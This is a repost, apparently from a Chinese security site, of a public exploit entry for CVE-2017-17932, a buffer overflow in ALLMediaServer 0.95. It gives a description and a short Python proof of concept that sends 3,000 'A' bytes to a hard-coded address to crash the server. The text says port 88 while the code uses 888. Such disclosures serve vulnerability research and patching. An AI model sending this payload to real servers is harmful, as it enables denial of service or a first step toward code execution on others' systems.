ALLMediaServer 0.95 - Buffer Overflow

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

ALLMediaServer 0.95 - Buffer Overflow

来源：https://twitter.com/aloycemjr 作者：Makalanga 发布时间：2017-12-28

# Exploit Title: Buffer overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service

1. Description

A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.


2. Proof of Concept

#!/usr/bin/python

#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work.

def main():

   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

   s.connect(('192.168.205.131', 888))

   buffer = "A" * 3000

   s.send(buffer)

   s.close()

if __name__ == '__main__':
   import socket

   main()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告